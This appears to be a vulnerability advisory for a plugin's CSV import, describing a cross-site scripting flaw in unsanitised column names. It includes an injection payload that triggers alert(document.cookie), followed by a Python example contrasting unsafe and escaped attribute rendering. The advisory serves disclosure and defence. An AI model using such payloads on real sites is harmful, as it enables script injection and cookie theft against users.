The plugin did not sanitise the column names when importing a malicious CSV file, allowing for HTML or JavaScript injection.
Import a CSV file containing the following in the header: ‘term**" autofocus onfocus={alert(‘Complex\u0020XSS’);alert(document.cookie);}//’"
| CPE | Name | Operator | Version |
|---|---|---|---|
| | directories | lt | 1.3.46 |
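
The missing control described above, shown as an added example (not the plugin's code): a CSV column name is placed into an HTML attribute with and without escaping, and an HTML parser reports which attributes the browser would see. The sample CSV, the `<input name="...">` rendering, the function names and the allowlist pattern are all assumptions made for illustration.

```python
import csv
import html
import io
import re
from html.parser import HTMLParser

# Constructed sample import file: the first header cell closes the attribute
# value it will be placed in and adds attributes of its own.
SAMPLE_CSV = '"term"" autofocus onfocus=""alert(1)",slug\nnews,news\n'
# Assumed policy for acceptable column names (not taken from the plugin).
PLAIN_NAME = re.compile(r"[A-Za-z0-9_ -]{1,64}")

def read_header(csv_text):
    """Return the column names from the first row of the CSV text."""
    return next(csv.reader(io.StringIO(csv_text)))

def render_unsafe(column):
    """Vulnerable pattern: the column name is concatenated into markup."""
    return '<input name="' + column + '">'

def render_safe(column):
    """Hardened pattern: escape for a double-quoted attribute value."""
    return '<input name="' + html.escape(column, quote=True) + '">'

def is_plain_name(column):
    """Import-time check that rejects names outside the assumed policy."""
    return PLAIN_NAME.fullmatch(column) is not None

class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = []
    def handle_starttag(self, tag, attrs):
        self.attrs.extend(name for name, _ in attrs)

def attribute_names(markup):
    """Attribute names an HTML parser sees in the rendered markup."""
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attrs

if __name__ == "__main__":
    for col in read_header(SAMPLE_CSV):
        print(repr(col), is_plain_name(col),
              attribute_names(render_unsafe(col)),
              attribute_names(render_safe(col)))
```

Escaping at output keeps the stored name intact while preventing it from leaving the attribute value; the import-time allowlist is a second, independent layer.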